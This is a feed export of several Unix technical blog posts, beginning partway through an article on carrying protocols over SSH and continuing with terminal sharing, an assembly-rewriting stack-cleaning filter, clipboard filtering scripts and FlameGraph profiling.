Remote forwarding is used to request to forward all incoming\nconnections on a remote port over the SSH connection. The remote side\nthen opens a new forwarded-tcpip channel for each connection. This\nis used by ssh -R.

\n
\nC \u2192 S      GLOBAL_REQUEST(\"tcpip-forward\", remote_addr, remote_port)\nC \u2190 S      REQUEST_SUCCESS(remote_port)\n    S \u2190 X  Incoming connection\nC \u2190 S      CHANNEL_OPEN(\"forwarded-tcpip\", chan, \u2026, address, port, peer_address, peer_port)\nC \u2192 S      CHANNEL_OPEN_CONFIRMATION(chan, chan2, \u2026)\n    S \u2190 X  TCP Payload \"aaa\"\nS \u2190 X      CHANNEL_DATA(chan2, \"aaa\")\n
\n\n

Unix socket forwarding

\n

Since OpenSSH 6.7, it is\npossible to involve (either local or remote) UNIX sockets in forwards\n(ssh -L, ssh -R, ssh -W):

\n

Client support is needed when the UNIX socket is on the client-side\nbut server-side support is not needed.

\n

When the UNIX socket is on the server-side, both client\nand server support is needed. This is using a protocol extension\nwhich works similarly to the TCP/IP forwarding:

\n\n

TUN/TAP Forwarding

\n

As an extension, OpenSSH has support for tunnel forwarding. A tunnel\ncan be either Ethernet-based (TUN devices) or IP based (TAP devices).\nAs channels do not preserve message boundaries, a header is prepended\nto each message (Ethernet frame or IP packet respectively): this\nheader contains the message length (and for IP based tunnels, the address family).

\n

This is used by ssh -w.

\n

Messages for an IP tunnel:

\n
\nC \u2192 S CHANNEL_OPEN(\"tun@openssh.com\", chan, \u2026, POINTOPOINT, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2)\nC \u2192 S CHANNEL_DATA(chan2, encapsulation + ip_packet)\n
\n\n

and the packets use the form:

\n
4B  packet length\n4B  address family (SSH_TUN_AF_INET or SSH_TUN_AF_INET6)\nvar data\n
\n\n\n

Messages for an Ethernet tunnel:

\n
\nC \u2192 S CHANNEL_OPEN(\"tun@openssh.com\", chan, \u2026, ETHERNET, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2)\nC \u2192 S CHANNEL_DATA(chan2, encapsulation + ethernet_frame)\n
\n\n

and the packets use the form:

\n
4B  packet length\nvar data\n
\n\n\n

X11 forwarding

\n

The x11 channel type is used for\nX11 forwarding.

\n

Examples of applications working over SSH

\n

SCP

\n

scp uses SSH to spawn a remote-side scp process. This remote scp\nprocess communicates with the local instance using its stdin and\nstdout.

\n

When the local scp sends data, it spawns:

\n
scp -t /some_path/\n
\n\n\n

When the local scp receives data, it spawns:

\n
scp -f /some_path/some_file\n
\n\n\n

rsync

\n

rsync can work over SSH. In this mode of operation, it uses SSH to\nspawn a server rsync process which communicates with its stdin and\nstdout.

\n

The local rsync spawns something like in the remote side:

\n
rsync --server -e.Lsfx . /some_path/\n
\n\n\n

SFTP

\n

SFTP is a file transfer protocol.\nIt is expected to to work on top of SSH\nusing the sftp subsystem. However it can work on top of other streams\n(see sftp -S $program and sftp -D $program).

\n

This is not FTP running over SSH.

\n

FISH

\n

FISH\nis another solution for file system operation over a\nremote shell (such as rsh or ssh): it uses exec sessions to\nexecute standard UNIX commands on the remote side in order to do the\noperations. This first approach will not work if the remote side is\nnot a UNIXish system: in order to have support for non UNIX, it\nencodes the same requests as special comments at the beginning of the\ncommand.

\n

Git

\n

Git spawns a remote git-upload-pack /some_repo/ which communicates\nwith the local instance using its standard I/O.

\n

Systemd

\n

Many systemd *ctl tools (hostnamectl, busctl, localectl,\ntimedatectl, loginctl, systemctl) have builtin support for\nconnecting to a remote host. They use a ssh -xT $user@$host\nsystemd-stdio-bridge. This\ntool connects to the D-Bus\nsystem bus\n(i.e. ${DBUS_SYSTEM_BUS_ADDRESS:-/var/run/dbus/system_bus_socket}).

\n

Summary

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
ProgramSolution
scpCommand (scp)
rsyncCommand (rsync)
sftpSubsystem (sftp)
FISHCommands / special comments
gitCommand (git-upload-pack)
systemdCommand (systemd-stdio-bridge)
\n

Comparison of the different solutions for protocol transport

\n

Which solution should be used to export your own\nprotocol over SSH? The shell, X11 forwarding and TUN/TAP forwarding\nare not really relevant in this context so we're left with:

\n\n

Convenience

\n

Using a dedicated subsystem is the cleaner solution.\nThe subsystem feature of SSH has been designed for this kind of application:\nit's supposed to hide implementation details such as the shell,\nPATH, whether the service is exposed as a socket or a command,\nwhat is the location of the socket,\nwhether socat is installed on the system, etc.\nHowever with OpenSSH, installing a new subsystem is done by adding a new entry\nin the /etc/ssh/sshd_config file which is not so convenient for packaging\nand not necessarily ideal for configuration management.\nAn Include directive has been included for ssh_config\n(client configuration) in OpenSSH 7.3: the same directive for sshd_config\nwould probably be useful in this context.\nIn practice, the subsystem feature seems to be mostly used by sftp.

\n

Using a command is the simpler solution: the only requirement is to\nadd a suitable executable, preferably in the PATH. Moreover, the\nuser can add his/her own commands (or override the system ones) for his/her\nown purpose by adding executables in its own PATH.

\n

These two solutions have a few extra features which are not really\nnecessary when used as a pure stream transport protocol but might be\nhandy:

\n\n

The two forwarding solutions have fewer features which are more in\nline with what's expected of a stream transport but:

\n\n

Authentication and authorization

\n

The command and subsystem solutions run code with the user's identity\nand will by default run with the user permissions. The setuid and\nsetgid bits might be used if this is not suitable.

\n

Another solution is to use socat or netcat to connect to a socket and get\nthe same behavior as socket forwarding (security-wise).

\n

For Unix socket forwarding, OpenSSH uses the user identity to connect\nto the socket. The daemon can use SO_PEERCRED (on Linux, OpenBSD),\ngetpeereid()\n(on BSD),\ngetpeerucred()\n(Solaris) to get the user UID, GID in order to avoid a second\nauthentication. On Linux, file-system permissions can be used to\nrestrict the access to the socket as well.

\n

For TCP socket forwarding, OpenSSH uses the user identity to connect to\nthe socket and ident (on localhost) might be used in order to get\nthe user identity but this solution is not very pretty.

\n

Conclusion

\n

I kind-of like the subsystem feature even if it's not used that much.

\n

The addition of an Include directive in sshd_config might help deploying\nsuch services. Another interesting feature would be an option to associate a\nsubsystem with a Unix socket (without having to rely on socat).

\n

References

\n\n
\n
\n
    \n
  1. \n

    The receiver uses the\nSSH_MSG_CHANNEL_WINDOW_ADJUST\nmessage to request more data.\u00a0\u21a9

    \n
  2. \n
  3. \n

    The random padding is used to make the whole Binary Packet Protocol message\na multiple of the cipher block size (or 8 if the block size is smaller).\u00a0\u21a9

    \n
  4. \n
  5. \n

    This is used to transport both stdout (SSH_MSG_CHANNEL_DATA(channel, data))\nand stderr (SSH_MSG_CHANNEL_EXTENDED_DATA(channel, SSH_EXTENDED_DATA_STDERR, data))\nover the same session channel.\u00a0\u21a9

    \n
  6. \n
  7. \n

    Each channel is associated with two integer IDs, one for each side\nof the connection.\u00a0\u21a9

    \n
  8. \n
  9. \n

    It is currently not yet registered but it is described in the SFTP\ndrafts\nand widely deployed.\u00a0\u21a9

    \n
  10. \n
  11. \n

    bash already does an implicit exec when bash -c\n\"$a_single_command\" is used.\u00a0\u21a9

    \n
  12. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2016/10/18/terminal-sharing/", "title": "Terminal read-only live sharing", "url": "https://www.gabriel.urdhr.fr/2016/10/18/terminal-sharing/", "date_published": "2016-10-18T00:00:00+02:00", "date_modified": "2017-05-06T00:00:00+02:00", "tags": ["computer", "unix", "ssh", "screen"], "content_html": "

Live sharing a terminal session to another (shared) host over SSH in\nread-only mode.

\n

Update: 2017-05-06 add broadcastting over the web with\nnode-webterm

\n

TLDR

\n
#!/bin/sh\n\nhost=\"$1\"\n\nfile=script.log\ntouch \"$file\"\ntail -f $file | ssh $host 'cat > script.log' &\nscript -f \"$file\"\nkill %1\nssh $host \"rm $file\"\nrm \"$file\"\n
\n\n\n

Using screen

\n

screen can save the content of the screen session on a file. This is\nenabled with the following screen commands:

\n
logfile screen.log\nlogfile flush 0\nlog on\n
\n\n\n

The logfile flush 0 command removes the buffering delay in screen\nin order to reduce the latency.

\n

We can watch the session locally (from another terminal) with:

\n
tail -f screen.log\n
\n\n\n

This might produce some garbage if the original and target terminals are not\ncompatible (echo $TERM is different) or if the terminal sizes are different:

\n\n

Instead of watching it locally, we want to send the content to another (shared)\nhost over SSH:

\n
tail -f screen.log | ssh $server 'cat > /tmp/logfile'\n
\n\n\n

Other users can now watch the session on the remote host with:

\n
tail -f screen.log\n
\n\n\n

Using xterm

\n

You can create a log file from xterm:

\n
xterm -l -lf xterm.log\n
\n\n\n

The rest of the technique applies the same.

\n

Best viewed from an xterm-compatible terminal.

\n

Using script

\n

script can be used to create a log file as well:

\n
script -f script.log\n
\n\n\n

Downsides

\n

The downside is that a log file is created on both the local and server-side.\nThis might file grow (especially if you broadcast\nnyancat \"\ud83d\ude38\" for a long time)\nand need to be cleaned up afterwards.

\n

A FIFO might be used instead of a log file with some programs. It\nworks with screen and script but not with xterm. However, I\nexperienced quite a few broken pipes (and associated brokeness) when\ntrying to use this method. Moreover, using a FIFO can probably stall\nsome terminals if the consumer does not consume the data fast enough.

\n

Broadcast service

\n

In order to avoid the remote log file, a solution is to setup a terminal\nbroadcast service. A local terminal broadcast service can be set up with:

\n
socat UNIX-LISTEN:script.socket,fork SYSTEM:'tail -f script.log'\n
\n\n\n

And we can watch it with:

\n
socat STDIO UNIX-CONNECT:script.socket\n
\n\n\n

We can expose this service to a remote host over SSH:

\n
ssh $server -R script.socket:script.socket -N\n
\n\n\n

The downside of this approach is that the content is transfered over\nSSH once per viewer instead of only once.

\n

Web broadcast

\n

node-webterm can be used to\nbroadcast the log over HTTP:

\n
{\n    \"login\": \"tail -f script.log\",\n    \"port\": 3000,\n    \"interface\": \"127.0.0.1\",\n    \"input\": true\n}\n
\n\n\n

This displays the terminal in the browser using\nterminal.js, a JavaScript\nxterm-compatible terminal emulator (executing client-side).\nThe default terminal size is the same as the default xterm size.\nIt can be configured in index.html.

"}, {"id": "http://www.gabriel.urdhr.fr/2014/10/06/cleaning-the-stack-by-filtering-the-assembly/", "title": "Cleaning the stack by filtering the assembly", "url": "https://www.gabriel.urdhr.fr/2014/10/06/cleaning-the-stack-by-filtering-the-assembly/", "date_published": "2014-10-06T00:00:00+02:00", "date_modified": "2014-10-06T00:00:00+02:00", "tags": ["computer", "simgrid", "unix", "compilation", "assembly", "x86_64"], "content_html": "

In order to help the SimGridMC state comparison code, I wrote a\nproof-of-concept LLVM pass which cleans each stack\nframe before using\nit. However, SimGridMC currently does not work properly when compiled\nwith clang/LLVM. We can do the same thing by pre-processing the\nassembly generated by the compiler before passing it to the linker:\nthis is done by inserting a script between the compiler and the\nassembler. This script will rewrite the generated assembly by\nprepending stack-cleaning code at the beginning of each function.

\n

Table of Content

\n
\n\n
\n

Summary

\n

In typical compilation process, the compiler (here cc1) reads the\ninput source file and generates assembly. This assembly is then passed\nto the assembler (as) which generates native binary code:

\n
cat foo.c | cc1  | as      > foo.o\n#         \u2191      \u2191         \u2191\n#         Source Assembly  Native\n
\n\n\n

We can achieve our goal without depending of LLVM by adding a simple\nassembly-rewriting script to this pipeline between the the compiler\nand the assembler:

\n
cat foo.c | cc1  | clean-stack-filter | as     > foo.o\n#         \u2191      \u2191                    \u2191        \u2191\n#         Source Assembly             Assembly Native\n
\n\n\n

By doing this, our modification can be used for any compiler as long\nas it sends assembly to an external assembler instead of generating\nthe native binary code directly.

\n

This will be done in three components:

\n\n

Assembly rewriting script

\n

The first step is to write a simple UNIX program taking in input the\nassembly code of a source file and adding in output a stack-cleaning\npre-prolog.

\n

Here is the generated assembly for the test function of the previous\nepisode (compiled with GCC):

\n
main:\n.LFB0:\n    .cfi_startproc\n    subq    $40, %rsp\n    .cfi_def_cfa_offset 48\n    movl    %edi, 12(%rsp)\n    movq    %rsi, (%rsp)\n    movl    $42, 28(%rsp)\n    movl    $0, %eax\n    call    f\n    movl    $0, %eax\n    addq    $40, %rsp\n    .cfi_def_cfa_offset 8\n    ret\n    .cfi_endproc\n
\n\n\n

We can use .cfi_startproc to find the beginning of a function and\neach pushq and subq $x, %rsp instruction to estimate the stack\nsize used by this function (excluding the red zone and alloca() as\npreviously). Each time we are seeing the beginning of a function we\nneed to buffer each line until we are ready to emit the stack-cleaning\ncode.

\n
#!/usr/bin/perl -w\n# Transform assembly in order to clean each stack frame for X86_64.\n\nuse strict;\n$SIG{__WARN__} = sub { die @_ };\n\n# Whether we are still scanning the content of a function:\nour $scanproc = 0;\n\n# Save lines of the function:\nour $lines = \"\";\n\n# Size of the stack for this function:\nour $size = 0;\n\n# Counter for assigning unique ids to labels:\nour $id=0;\n\nsub emit_code {\n    my $qsize = $size / 8;\n    my $offset = - $size - 8;\n\n    if($size != 0) {\n      print(\"\\tmovabsq \\$$qsize, %r11\\n\");\n      print(\".Lstack_cleaner_loop$id:\\n\");\n      print(\"\\tmovq    \\$0, $offset(%rsp,%r11,8)\\n\");\n      print(\"\\tsubq    \\$1, %r11\\n\");\n      print(\"\\tjne     .Lstack_cleaner_loop$id\\n\");\n    }\n\n    print $lines;\n\n    $id = $id + 1;\n    $size = 0;\n    $lines = \"\";\n    $scanproc = 0;\n}\n\nwhile (<>) {\n  if ($scanproc) {\n      $lines = $lines . $_;\n      if (m/^[ \\t]*.cfi_endproc$/) {\n      emit_code();\n      } elsif (m/^[ \\t]*pushq/) {\n      $size += 8;\n      } elsif (m/^[ \\t]*subq[\\t *]\\$([0-9]*),[ \\t]*%rsp$/) {\n          my $val = $1;\n          $val = oct($val) if $val =~ /^0/;\n          $size += $val;\n          emit_code();\n      }\n  } elsif (m/^[ \\t]*.cfi_startproc$/) {\n      print $_;\n\n      $scanproc = 1;\n  } else {\n      print $_;\n  }\n}\n
\n\n\n

This is used as:

\n
# Use either of:\nclean-stack-filter < helloworld.s\ngcc -o- -S hellworld.c | clean-stack-filter | gcc -x assembler -r -o helloworld\n
\n\n\n

And this produces:

\n
main:\n.LFB0:\n    .cfi_startproc\n    movabsq $5, %r11\n.Lstack_cleaner_loop0:\n    movq    $0, -48(%rsp,%r11,8)\n    subq    $1, %r11\n    jne     .Lstack_cleaner_loop0\n    subq    $40, %rsp\n    .cfi_def_cfa_offset 48\n    movl    %edi, 12(%rsp)\n    movq    %rsi, (%rsp)\n    movl    $42, 28(%rsp)\n    movl    $0, %eax\n    call    f\n    movl    $0, %eax\n    addq    $40, %rsp\n    .cfi_def_cfa_offset 8\n    ret\n    .cfi_endproc\n
\n\n\n

Assembler wrapper

\n

A second step is to write an extended assembler as program which\naccepts an extra argument --filter my_shell_command. We could\nhardcode the filtering script in this wrapper but a generic assembler\nwrapper might be reused somewhere else.

\n

We need to:

\n
    \n
  1. \n

    interpret a part of the as command line arguments and our extra\n argument;

    \n
  2. \n
  3. \n

    apply the specified filter on the input assembly;

    \n
  4. \n
  5. \n

    pass the resulting assembly to the real assembler.

    \n
  6. \n
\n
#!/usr/bin/ruby\n# Wrapper around the real `as` which adds filtering capabilities.\n\nrequire \"tempfile\"\nrequire \"fileutils\"\n\ndef wrapped_as(argv)\n\n  args=[]\n  input=nil\n  as=\"as\"\n  filter=\"cat\"\n\n  i = 0\n  while i<argv.size\n    case argv[i]\n\n    when \"--as\"\n      as = argv[i+1]\n      i = i + 1\n    when \"--filter\"\n      filter = argv[i+1]\n      i = i + 1\n\n    when \"-o\", \"-I\"\n      args.push(argv[i])\n      args.push(argv[i+1])\n      i = i + 1\n    when /^-/\n      args.push(argv[i])\n    else\n      if input\n        exit 1\n      else\n        input = argv[i]\n      end\n    end\n    i = i + 1\n  end\n\n  if input==nil\n    # We dont handle pipe yet:\n    exit 1\n  end\n\n  # Generate temp file\n  tempfile = Tempfile.new(\"as-filter\")\n  unless system(filter, 0 => input, 1 => tempfile)\n    status=$?.exitstatus\n    FileUtils.rm tempfile\n    exit status\n  end\n  args.push(tempfile.path)\n\n  # Call the real assembler:\n  res = system(as, *args)\n  status = if res != nil\n             $?.exitstatus\n           else\n             1\n           end\n  FileUtils.rm tempfile\n  exit status\n\nend\n\nwrapped_as(ARGV)\n
\n\n\n

This is used like this:

\n
tools/as --filter \"sed s/world/abcde/\" helloworld.s\n
\n\n\n

We now can ask the compiler to use our assembler wrapper instead of\nthe real system assembler:

\n\n
gcc -B tools/ -Wa,--filter,'sed s/world/abcde/' \\\n  helloworld.c -o helloworld-modified-gcc\n
\n\n\n
clang -no-integrated-as -B tools/ -Wa,--filter,'sed s/world/abcde/' \\\n  helloworld.c -o helloworld-modified-clang\n
\n\n\n

Which produces:

\n
\n$ ./helloworld\nHello world!\n$ ./helloworld-modified-gcc\nHello abcde!\n$ ./helloworld-modified-clang\nHello abcde!\n
\n\n

By combining the two tools, we can get a compiler with stack-cleaning enabled:

\n
gcc -B tools/  -Wa,--filter,'stack-cleaning-filter' \\\n  helloworld.c -o helloworld\n
\n\n\n

Compiler wrapper

\n

Now we can write compiler wrappers which do this job automatically:

\n
#!/bin/sh\npath=(dirname $0)\nexec gcc -B $path -Wa,--filter,\"$path\"/clean-stack-filter \"$@\"\n
\n\n\n
#!/bin/sh\npath=(dirname $0)\nexec g++ -B $path -Wa,--filter,\"$path\"/clean-stack-filter \"$@\"\n
\n\n\n
\n

Warning

\n

As the assembly modification is implemented in as,\nthis compiler wrapper will output the unmodified assembly when using\ncc -S which be surprising. You need to objdump the .o file in\norder to see the effect of the filter.

\n
\n

Result

\n

The whole test suite of SimGrid with model-checking works with this\nimplementation. The next step is to see the impact of this\nmodification on the state comparison of SimGridMC.

"}, {"id": "http://www.gabriel.urdhr.fr/2014/09/25/filtering-the-clipboard/", "title": "Filtering the clipboard using UNIX filters", "url": "https://www.gabriel.urdhr.fr/2014/09/25/filtering-the-clipboard/", "date_published": "2014-09-25T00:00:00+02:00", "date_modified": "2014-09-25T00:00:00+02:00", "tags": ["computer", "x11", "unix", "cms", "hmtl"], "content_html": "

I had a few Joomla posts that I wanted to clean up semi-automatically.\nHere are a few scripts, to pass the content of the clipboard (or the\ncurrent selection) through a UNIX filter.

\n

Filter for cleaning HTML posts

\n

Cleaning up the (HTML) content of the posts was quite time consuming\nand very repetitive:

\n\n

Most of the job could be done by a script\n(cleanup_html):

\n
#!/usr/bin/env ruby\n# Remove some crap from HTMl snippets.\n\nrequire \"nokogiri\"\n\nif (ARGV[0])\n  html = File.read(ARGV[0])\nelse\n  html = $stdin.read\nend\ndoc = Nokogiri::HTML::DocumentFragment.parse html\n\n# Remove 'style':\ndoc.css(\"*[style]\").each do |node|\n  style = node.attribute(\"style\")\n  node.remove_attribute(\"style\")\n  $stderr.puts \"Removed style: #{style}\\n\"\nend\n\n# Remove useless span:\ndoc.css(\"span\").each do |span|\n  $stderr.puts \"Unwrapping span: #{span}\\n\"\n  span.children.each do |x|\n    span.before(x)\n  end\n  span.remove\nend\n\n# Split paragraphs on <br/>:\ndoc.css(\"p > br\").each do |br|\n  p = br.parent\n\n  # Clone\n  new_p = p.document.create_element(\"p\")\n  p.children.take_while{ |x| x!=br }.each do |x|\n    new_p.add_child x\n  end\n  p.before(new_p)\n\n  br.remove\nend\n\n# Remove empty paragraphs:\ndoc.css(\"p\").each do |node|\n  if node.element_children.empty? && /\\A *\\z/.match(node.inner_text)\n    node.remove\n  end\nend\n\nprint doc.to_html\n
\n\n\n

Filtering the clipboard or selection

\n

I wanted to do a semi-automatic update in order to have feedback on\nwhat was happening and fix the remaining issues straightaway. To do\nthis, the filter can be applied on the X11 clipboard:

\n
#!/bin/sh\nxclip -out -selection clipboard | filter_html | xclip -in -selection clipboard\n
\n\n\n

It is even possible to do it on the current selection:

\n
#!/bin/sh\nsleep 0.1\nxdotool key control+c\nsleep 0.1\nxclip -out -selection clipboard | filter_htm | xclip -in -selection clipboard\nxdotool key control+v\n
\n\n\n

This second script is quite hackish but it kind of works:

\n\n

This can be generalized with this script (gui_filter):

\n
#!/bin/sh\n\nmode=\"$1\"\nshift\n\ncase \"$mode\" in\n    primary | seconday | clipboard)\n        xclip -out -selection \"$mode\" | command \"$@\" | xclip -in -selection \"$mode\"\n        ;;\n    selection)\n        # This is an horrible hack.\n        # It only works for C-c/C-v keybindings.\n        sleep 0.1\n        xdotool key control+c\n        sleep 0.1\n        xclip -out -selection clipboard | command \"$@\" | xclip -in -selection clipboard\n        xdotool key control+v\n        ;;\nesac\n
\n\n\n

Called with:

\n
# Clean the HTMl markup in the clipboard:\ngui_filter clipboard html_filter\n\n# Base-64 encode the current selection:\ngui_filter selection base64\n\n# Base-64 decode the current selection:\ngui_filter selection base64 -d\n
\n\n\n

Binding it to a key

\n

Now we can bind this command to a temporary global hotkey with this\nscript based on the keybinder library:

\n
#!/usr/bin/env python\n# Bind a global hotkey to a given command.\n# Examples:\n#   keybinder '<Ctrl>e' gui_filter selection base64\n#   keybinder '<Ctrl>X' xterm\n\nimport sys\nimport gi\nimport os\nimport signal\n\ngi.require_version('Keybinder', '3.0')\nfrom gi.repository import Keybinder\nfrom gi.repository import Gtk\n\ndef callback(x):\n    os.spawnvp(os.P_NOWAIT, sys.argv[2], sys.argv[2:])\n\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\nGtk.init()\nKeybinder.init()\nKeybinder.bind(sys.argv[1], callback);\nGtk.main()\n
\n\n\n

The kotkey is active as long as the keybinder process is not killed.

\n

Conclusion

\n
keybinder '<Ctrl>e' gui_filter selection html_filter\nkeybinder '<Ctrl>e' gui_filter selection kramdown\nkeybinder '<Ctrl>e' gui_filter selection cowsay\nkeybinder '<Ctrl>e' gui_filter selection sort\n\n# More dangerous:\nkeybinder '<Ctrl>e' gui_filter clipboard bash\nkeybinder '<Ctrl>e' gui_filter clipboard ruby\nkeybinder '<Ctrl>e' gui_filter clipboard python\n
\n\n\n

Other solutions

\n

With Emacs

\n

On Emacs, the shell-command-on-region command (bound to\nM-|) can be used to pass the current selection to a given\ncommand: by default the output of the command will be pushed on the\nring buffer. Alternatively, C-u M-| can be used to replace\nthe selection.

\n

With Vim

\n

The ! command can be used to transform a given part of the\ncurrent buffer through a shell filter.

\n

With atom

\n

Atom can replace filter the current selection through a pipe\nwith the pipe package.

"}, {"id": "http://www.gabriel.urdhr.fr/2014/05/23/flamegraph/", "title": "Profiling and optimising with Flamegraph", "url": "https://www.gabriel.urdhr.fr/2014/05/23/flamegraph/", "date_published": "2014-05-23T00:00:00+02:00", "date_modified": "2014-05-23T00:00:00+02:00", "tags": ["simgrid", "optimisation", "profiling", "computer", "flamegraph", "unix", "gdb", "perf"], "content_html": "

Flamegraph\nis a software which generates SVG graphics\nto visualise stack-sampling based\nprofiles. It processes data collected with tools such as Linux perf,\nSystemTap, DTrace.

\n

For the impatient:

\n\n

Table of Content

\n
\n\n
\n

Profiling by sampling the stack

\n

The idea is that in order to know where your application is using CPU\ntime, you should sample its stack. You can get one sample of the\nstack(s) of a process with GDB:

\n
# Sample the stack of the main (first) thread of a process:\ngdb -ex \"set pagination 0\" -ex \"bt\" -batch -p $(pidof okular)\n\n# Sample the stack of all threads of the process:\ngdb -ex \"set pagination 0\" -ex \"thread apply all bt\" -batch -p $(pidof okular)\n
\n\n\n

This generates backtraces such as:

\n
[...]\nThread 2 (Thread 0x7f4d7bd56700 (LWP 15156)):\n#0  0x00007f4d9678b90d in poll () from /lib/x86_64-linux-gnu/libc.so.6\n#1  0x00007f4d93374fe4 in g_main_context_poll (priority=2147483647, n_fds=2, fds=0x7f4d70002e70, timeout=-1, context=0x7f4d700009a0) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:4028\n#2  g_main_context_iterate (context=context@entry=0x7f4d700009a0, block=block@entry=1, dispatch=dispatch@entry=1, self=<optimized out>) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:3729\n#3  0x00007f4d933750ec in g_main_context_iteration (context=0x7f4d700009a0, may_block=1) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:3795\n#4  0x00007f4d9718b676 in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#5  0x00007f4d9715cfef in QEventLoop::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#6  0x00007f4d9715d2e5 in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#7  0x00007f4d97059bef in QThread::exec() () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#8  0x00007f4d9713e763 in ?? () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#9  0x00007f4d9705c2bf in ?? () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#10 0x00007f4d93855062 in start_thread () from /lib/x86_64-linux-gnu/libpthread.so.0\n#11 0x00007f4d96796c1d in clone () from /lib/x86_64-linux-gnu/libc.so.6\n\nThread 1 (Thread 0x7f4d997ab780 (LWP 15150)):\n#0  0x00007f4d9678b90d in poll () from /lib/x86_64-linux-gnu/libc.so.6\n#1  0x00007f4d93374fe4 in g_main_context_poll (priority=2147483647, n_fds=8, fds=0x2f8a940, timeout=1998, context=0x1c747e0) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:4028\n#2  g_main_context_iterate (context=context@entry=0x1c747e0, block=block@entry=1, dispatch=dispatch@entry=1, self=<optimized out>) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:3729\n#3  0x00007f4d933750ec in g_main_context_iteration (context=0x1c747e0, may_block=1) at /tmp/buildd/glib2.0-2.40.0/./glib/gmain.c:3795\n#4  0x00007f4d9718b655 in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#5  0x00007f4d97c017c6 in ?? () from /usr/lib/x86_64-linux-gnu/libQtGui.so.4\n#6  0x00007f4d9715cfef in QEventLoop::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#7  0x00007f4d9715d2e5 in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#8  0x00007f4d97162ab9 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#9  0x00000000004082d6 in ?? ()\n#10 0x00007f4d966d2b45 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6\n#11 0x0000000000409181 in _start ()\n[...]\n
\n\n\n

By doing this a few times, you should be able to have an idea of\nwhat's taking time in your process (or thread).

\n

Using FlameGraph for visualising stack samples

\n

Taking a few random stack samples of the process might be fine and\nhelp you in some cases but in order to have more accurate information,\nyou might want to take a lot of stack samples. FlameGraph can help you\nvisualize those stack samples.

\n

How does FlameGraph work?

\n

FlameGraph reads a file from the standard input representing stack\nsamples in a simple format where each line represents a type of stack\nand the number of samples:

\n
main;init;init_boson_processor;malloc  2\nmain;init;init_logging;malloc          4\nmain;processing;compyte_value          8\nmain;cleanup;free                      3\n
\n\n\n

FlameGraph generates a corresponding SVG representation:

\n
\n\n \"[corresponding\n\n
Corresponding FlameGraph output
\n
\n\n

FlameGraph ships with a set of preprocessing scripts\n(stackcollapse-*.pl) used to convert data from various\nperformance/profiling tools into this simple format\nwhich means you can use FlameGraph with perf, DTrace,\nSystemTap or your own tool:

\n
your_tool | flamegraph_preprocessor_for_your_tool | flamegraph > result.svg\n
\n\n\n

It is very easy to add support for a new tool in a few lines of\nscripts. I wrote a\npreprocessor\nfor the GDB backtrace output (produced by the previous poor man's\nprofiler script) which is now available\nin the main repository.

\n

As FlameGraph uses a tool-neutral line-oriented format, it is very\neasy to add generic filters after the preprocessor (using sed,\ngrep\u2026):

\n
the_tool | flamegraph_preprocessor_for_the_tool | filters | flamegraph > result.svg\n
\n\n\n

Update 2015-08-22:\nElfutils ships a stack program\n(called eu-stack on Debian) which seems to be much faster than GDB\nfor using as a Poor man's Profiler in a shell script. I wrote a\nscript in order to feed its output to\nFlameGraph.

\n

Using FlameGraph with perf

\n

perf is a very powerful tool for Linux to do performance analysis of\nprograms. For example, here's how we can generate a\non-CPU\nFlameGraph of an application using perf:

\n
# Use perf to do a time based sampling of an application (on-CPU):\nperf record -F99 --call-graph dwarf myapp\n\n# Turn the data into a cute SVG:\nperf script | stackcollapse-perf.pl | flamegraph.pl > myapp.svg\n
\n\n\n

This samples the on-CPU time, excluding time when the process in not\nscheduled (idle, waiting on a semaphore\u2026) which may not be what you\nwant. It is possible to sample\noff-CPU\ntime as well with\nperf.

\n

The simple and fast solution1 is to use the frame pointer\nto unwind the stack frames (--call-graph fp). However, frame pointer\ntends to be omitted these days (it is not mandated by the x86_64 ABI):\nit might not work very well unless you recompile code and dependencies\nwithout omitting the frame pointer (-fno-omit-frame-pointer).

\n

Another solution is to use CFI to unwind the stack (with --call-graph\ndwarf): this uses either the DWARF CFI (.debug_frame section) or\nruntime stack unwinding (.eh_frame section). The CFI must be present\nin the application and shared-objects (with\n-fasynchronous-unwind-tables or -g). On x86_64, .eh_frame should\nbe enabled by default.

\n

Update 2015-09-19: Another solution on recent Intel chips (and\nrecent kernels) is to use the hardware LBR\nregisters (with --call-graph\nlbr).

\n

Transforming and filtering the data

\n

As FlameGraph uses a simple line oriented format, it is very easy to\nfilter/transform the data by placing a filter between the\nstackcollapse preprocessor and FlameGraph:

\n
# I'm only interested in what's happening in MAIN():\nperf script | stackcollapse-perf.pl | grep MAIN | flamegraph.pl > MAIN.svg\n\n# I'm not interested in what's happening in init():\nperf script | stackcollapse-perf.pl | grep -v init | flamegraph.pl > noinit.svg\n\n# Let's pretend that realloc() is the same thing as malloc():\nperf script | stackcollapse-perf.pl | sed/realloc/malloc/ | flamegraph.pl > alloc.svg\n
\n\n\n

